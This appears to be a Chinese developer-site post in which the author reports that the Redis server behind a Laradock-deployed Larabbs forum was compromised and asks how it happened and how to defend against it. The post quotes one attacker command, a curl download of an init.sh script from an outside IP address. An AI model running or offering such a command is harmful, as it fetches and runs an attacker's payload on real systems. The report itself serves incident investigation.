菜单 学习猿地 - LMONKEY

VIP

开通学习猿地VIP

尊享10项VIP特权 持续新增

知识通关挑战

打卡带练!告别无效练习

接私单赚外块

VIP优先接,累计金额超百万

学习猿地私房课免费学

大厂实战课仅对VIP开放

你的一对一导师

每月可免费咨询大牛30次

开通VIP

领取更多软件工程师实用特权

 入驻

搜索

类型: 全部 | 视频教程 | 实战项目 | 项目源码 | 技术手册 | 课件 | 测试题 | 技术文章 | 软件下载 | 问答求助
水平: 全部 | 入门 | 普通 | 进阶

历史记录 清除记录

    你还没搜索过喔。

近期热搜

项目开发全程实录(电商EW_Shop)

8680 人 1年前

轻松学会Laravel-项目篇(商城API)

2022 人 1年前

Python数据分析2.0-金融

325 人 1年前

Python办公自动化2.0

241 人 1年前
猿创博文
猿创博文 / Web前端 /
正文
2562
8

部署 Larabbs 论坛线上服务器的 Redis 被黑了

原创
wjq227
Web前端
05/13 14:22
阅读数 2389
尊享10+项VIP特权
会员卡
开通学习猿地会员卡

今早上在打开我部署在线上服务器的 Larabbs 论坛时发现报了一个错:

MISCONF Redis is configured to save RDB snapshots, but it is currently not able to persist on disk. Commands that may modify the data set are disabled, because this instance is configured to report errors during writes if RDB snapshotting fails (stop-writes-on-bgsave-error option). Please check the Redis logs for details about the RDB error.

之后通过 127.0.0.1:6379> config set stop-writes-on-bgsave-error no 命令解决了问题。

打开 Redis 0 号数据库,发现里面多了几条 string 类型的记录 1, Back1, Back2, Back3

我部署在线上服务器的 Larabbs 论坛被黑了

执行 curl -fsSL http://198.13.42.229:8667/6HqJB0SPQqbFbHJD/init.sh 等命令得了一些脚本(因为非常长就不全贴出来了,有兴趣大家可以自己拉下来这些脚本看看):
我部署在线上服务器的 Larabbs 论坛被黑了

主要是想问两个问题:

  • 他可能是通过哪种方式在我的 Redis 数据库中留下记录的?
  • 他这些脚本是用来干嘛的?
  • 我之后该怎么防范类似的攻击

我线上服务器环境是用 Laradock 来搭的,其中 Redis 没有密码,但也没开放公网访问。

2562
8
2421

© 著作权归作者所有

举报

发表评论

0/200
2562 点赞
8 评论
收藏

关于作者

wjq227
vip
wjq227
私信
提问
文章
150
经验值
4.7K
粉丝
319
关注
0
猿创计划
立即入驻

自媒体入驻学习猿地,

获百万流量,打造个人技术品牌

为你推荐 换一批
友情链接:

实猿科技 学习猿地-LMONKEY © 辽ICP备19013136号

学习猿地
程序员学习的地方

扫码关注